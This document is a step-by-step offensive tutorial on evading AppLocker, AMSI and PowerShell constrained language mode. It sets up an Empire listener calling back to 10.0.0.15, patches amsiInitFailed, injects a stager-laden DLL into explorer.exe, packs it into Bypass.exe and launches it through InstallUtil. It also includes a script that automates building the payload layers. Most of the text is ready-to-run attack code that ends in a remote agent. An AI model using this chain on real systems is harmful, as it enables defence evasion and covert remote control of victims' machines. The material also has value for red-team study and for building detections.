# Bypassing AppLocker and PowerShell constrained language mode

## Using Reflective Injection and Certutil

This technique nests several layers of packing so that each security control is bypassed in turn. It is based on the [awesome article](https://improsec.com/blog/babushka-dolls-or-how-to-bypass-application-whitelisting-and-constrained-powershell) from Improsec called "Babushka dolls" and on elements from its GitHub project.

**Edit: Sadly, from Windows 10 1803 onwards this trick no longer bypasses AMSI. AMSI now uses AmsiScanBuffer instead of the AmsiScanString call it used previously.**

### Generating listener and stager in Empire

Set up a listener and generate a stager. All the commands are below for easy copy-paste.

```
./Empire
listeners
uselistener http
set Host 10.0.0.15
set Port 80
execute
back
usestager multi/launcher
set Listener http
generate
```

![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODYsRyEN-bemyeF_3-%2F-LOD_3E5oZbBiam86Usz%2Fimage.png?alt=media\&token=b3f1e824-0401-4ead-a5fc-009f611cc462)

![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODYsRyEN-bemyeF_3-%2F-LOD_FcPV9CfcXV1Ysrf%2Fimage.png?alt=media\&token=a682532b-ede1-4048-9ca4-7564389baf59)

### ReflectivePick with Visual Studio

We are now going to embed the stager we just generated in the ReflectivePick project.

Open the [PowerPick project](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick/ReflectivePick) in VS. It may be necessary to set the target platform to x64: Project -> ReflectivePick Properties -> Configuration Manager -> Platform.

![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODYsRyEN-bemyeF_3-%2F-LOD_liPhVHEZeggXmID%2Fimage.png?alt=media\&token=17b0d04b-5fef-48bb-8629-cbf47b94627c)

Paste the base64 blob from the stager (the part after `-enc` in the launcher one-liner) in place of `BASE64STRING`. Empire's `-enc` payload is UTF-16LE, which is why the argument below decodes it with `[System.Text.Encoding]::Unicode` rather than UTF-8.

![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODYsRyEN-bemyeF_3-%2F-LODcGVNblBIAxcrDenT%2Fimage.png?alt=media\&token=b0c3fd21-4d53-443b-8e25-f0a8c957bb4f)

```
// PowerShell that ReflectivePick runs in its in-process runspace.
// 1. Set the private static AmsiUtils.amsiInitFailed flag so AMSI scanning is skipped.
// 2. Decode the UTF-16LE base64 stager, write it out for inspection, then IEX it.
// Backslashes in the Windows path must be doubled inside the C string literal.
wchar_t* argument = L"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);$encoded = \"BASE64STRING\";$decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded));$decoded | Out-File -FilePath C:\\Windows\\Tasks\\out.txt;IEX $decoded"; // Output debug
```

The `Out-File` step only exists so you can inspect the decoded stager afterwards; it writes the cleartext stager to disk, so remove it if you don't need it.

Compile the dll to `ReflectivePick_x64.dll`

![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODeeknJ7aRAiZEBt9A%2F-LODf-HZXVW3eFGYl_fP%2Fimage.png?alt=media\&token=4db67446-272a-4e28-a7f4-22c26a636808)

### Execution

We can now try to run the DLL with `rundll32.exe .\ReflectivePick_x64.dll,Void`, but as you will soon discover, AMSI catches the Empire stager at runtime.

![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODYsRyEN-bemyeF_3-%2F-LODZ1XSgrRpZIF06LAN%2Fimage.png?alt=media\&token=99946f4c-f5c9-4087-84da-7ab098800a4c)

Disable AMSI, however, and you get an agent back.

![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODYsRyEN-bemyeF_3-%2F-LODe9pxMld_vegJdkV2%2Fimage.png?alt=media\&token=87e58a21-90cb-459d-a6ef-e8a603f085ce)

You can also view the base64-decoded stager payload in `c:\windows\tasks\out.txt`

![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODYsRyEN-bemyeF_3-%2F-LODePJSbSFDjIoupDUL%2Fimage.png?alt=media\&token=2788e2ca-beb0-48aa-a14d-ef4264aaf834)

We can't rely on AMSI being disabled by hand on a target, so we are going to run the payload through a few more hoops.

### Load the DLL into another process

To avoid spawning a new process and loading a non-whitelisted DLL from disk, we are going to reflectively inject it into an existing process using [Invoke-ReflectivePEInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1) from PowerSploit.

Use the following commands in PowerShell to base64-encode the DLL and write the result to a file. Don't worry if the commands take a few seconds to run. I have also noticed that PowerShell adds a newline at the bottom of the file when base64-encoding like this (Out-File appends one unless `-NoNewline` is given), so manually remove it if it is present.

```
# Read the raw DLL bytes (Windows PowerShell 5.1; PowerShell 7 uses -AsByteStream instead)
$Content = Get-Content .\ReflectivePick_x64.dll -Encoding Byte
$Encoded = [System.Convert]::ToBase64String($Content)
# -NoNewline avoids the trailing newline that would otherwise end up in the pasted blob
$Encoded | Out-File "C:\users\chris\Desktop\PowerTools-master\PowerPick\bin\x64\Debug\dll.txt" -NoNewline
```

![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODgq2h6Ef6q8Wbv8ir%2F-LODhGGB3nJcqsyrJmmW%2Fimage.png?alt=media\&token=3497bc51-c2d2-415e-8f0d-3881f42ec645)

Now download [Invoke-ReflectivePEInjection](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1) to the working directory and open it in a text editor. At the bottom of the file, append the following lines, pasting the contents of `dll.txt` into the `$dllData` variable. Because the function is defined in the same file, the script reflectively injects the DLL into the `explorer.exe` process as soon as it runs.

```
# Appended to the end of Invoke-ReflectivePEInjection.ps1
$dllData = "DLLBASE64_GOES_HERE"
# -ProcId takes a single PID; pick the first explorer if more than one is running
$ProcId = (Get-Process explorer | Select-Object -First 1).Id
$Bytes = [System.Convert]::FromBase64String($dllData)
Invoke-ReflectivePEInjection -PEBytes $Bytes -ProcId $ProcId
```

![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LOEFF_bq46ZMZR-vgVT%2F-LOEFcB-T-DY2VNgVNmI%2Fimage.png?alt=media\&token=39509298-a33c-4444-aacc-e54ddc6feb8c)

### Compile to an EXE using VS

In PowerShell, base64-encode the entire modified script. Remove the trailing newline from the output file if present.

```
# Encode the raw bytes of the modified script (Windows PowerShell 5.1 syntax)
$Content = Get-Content .\Invoke-ReflectivePEInjection.ps1 -Encoding Byte
$Encoded = [System.Convert]::ToBase64String($Content)
# -NoNewline keeps the trailing newline out of the file you will paste from
$Encoded | Out-File "C:\users\chris\Desktop\PowerTools-master\PowerPick\bin\x64\Debug\pe.txt" -NoNewline
```
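The three encoding steps above (DLL to base64, loader script with the injection call appended, script to base64) are easy to get subtly wrong by hand: a trailing newline, a BOM, or a path resolved against the wrong working directory will break the inner layer. The script below, an added example that is not part of the original post or of the Babushka Dolls project, performs all three steps in one go and checks that each layer round-trips. The file names and the target process are assumptions; adjust them to your build directory.

```powershell
# Added example: build the nested layers from the page in one script.
# Assumed inputs: the compiled DLL and the unmodified PowerSploit loader in $PWD.
$ErrorActionPreference = 'Stop'

$DllPath    = Join-Path $PWD.Path 'ReflectivePick_x64.dll'           # assumed path
$LoaderPath = Join-Path $PWD.Path 'Invoke-ReflectivePEInjection.ps1' # assumed path
$OutPs1     = Join-Path $PWD.Path 'Invoke-ReflectivePEInjection.built.ps1'
$OutB64     = Join-Path $PWD.Path 'pe.txt'   # paste into the Bypass project's encoded variable
$TargetProc = 'explorer'                     # assumed injection target

# Layer 1: the DLL as base64. ReadAllBytes works in both Windows PowerShell and
# PowerShell 7 (Get-Content -Encoding Byte does not exist in 7; it is -AsByteStream there).
$dllB64 = [Convert]::ToBase64String([IO.File]::ReadAllBytes($DllPath))

# Layer 2: append the injection call to the loader. The function lives in the same
# file, so nothing needs to be dot-sourced when the script runs on the target.
$loader = [IO.File]::ReadAllText($LoaderPath)
$tail = @"

`$dllData = "$dllB64"
`$ProcId  = (Get-Process $TargetProc | Select-Object -First 1).Id
`$Bytes   = [Convert]::FromBase64String(`$dllData)
Invoke-ReflectivePEInjection -PEBytes `$Bytes -ProcId `$ProcId
"@
# WriteAllText writes exactly what it is given: no trailing newline, and no BOM
# with a UTF8Encoding constructed with $false.
[IO.File]::WriteAllText($OutPs1, $loader + $tail, [Text.UTF8Encoding]::new($false))

# Layer 3: the whole script as base64 for Bypass.exe. This encodes the raw file
# bytes, the same thing the page's Get-Content -Encoding Byte step does.
$ps1B64 = [Convert]::ToBase64String([IO.File]::ReadAllBytes($OutPs1))
[IO.File]::WriteAllText($OutB64, $ps1B64, [Text.UTF8Encoding]::new($false))

# Sanity checks: the DLL layer is still a PE image (MZ header) and the script
# layer still contains the injection call after decoding.
$dllBack = [Convert]::FromBase64String($dllB64)
if ($dllBack[0] -ne 0x4D -or $dllBack[1] -ne 0x5A) { throw 'DLL layer does not start with MZ' }
$ps1Back = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($ps1B64))
if ($ps1Back -notmatch 'Invoke-ReflectivePEInjection -PEBytes') { throw 'script layer lost the injection call' }

'DLL base64: {0} chars; script base64: {1} chars -> {2}' -f $dllB64.Length, $ps1B64.Length, $OutB64
```

Run it from the directory that holds the DLL and the loader. The .NET file APIs are used deliberately: `Out-File` would add a newline and, on Windows PowerShell, a UTF-16 BOM, and .NET's notion of the current directory does not always match PowerShell's `$PWD`, which is why every path is built with `Join-Path $PWD.Path`.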

![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODgq2h6Ef6q8Wbv8ir%2F-LODkjnLAmWMt8VGDQ_f%2Fimage.png?alt=media\&token=1bcc07d8-7d55-4cbe-94b2-affc6349ed13)

Open the [Bypass project](https://github.com/MortenSchenk/Babuska-Dolls/tree/master/Bypass) in VS and paste the base64 into the encoded variable. Compile it to `Bypass.exe` with VS.

![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LOEFF_bq46ZMZR-vgVT%2F-LOEFShMYmaq_sUFqaaS%2Fimage.png?alt=media\&token=9030e5dc-3181-495f-b310-33be56a75ec5)

### Final execution

Use `installutil.exe` or a similar [LOLBin](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LOLBins.md) to execute `Bypass.exe`. If AppLocker is present, run it from a whitelisted directory such as `C:\Windows\Tasks`, which is writable by standard users but still covered by the default "allow everything under %WINDIR%" rule. The `/U` switch makes InstallUtil run the uninstall path, which is where this LOLBin technique hooks its code.

```
C:\windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\Bypass.exe 
```

![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODvHqU2TrAlgHAS47m%2F-LOEE91ztrMVlzoHbpq-%2Fimage.png?alt=media\&token=5b8e1059-c308-4d9d-a202-9d76d46be9fe)

![](https://4015126252-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LBXJ8RJm7fk-rUVqjK5%2F-LODvHqU2TrAlgHAS47m%2F-LOEEH5P2ObycOZP5-cM%2Fimage.png?alt=media\&token=bd00293e-00cc-4a8b-924a-cc9096621bf5)

Thrilling! We bypassed both AppLocker and PowerShell constrained language mode and got an Empire agent back.
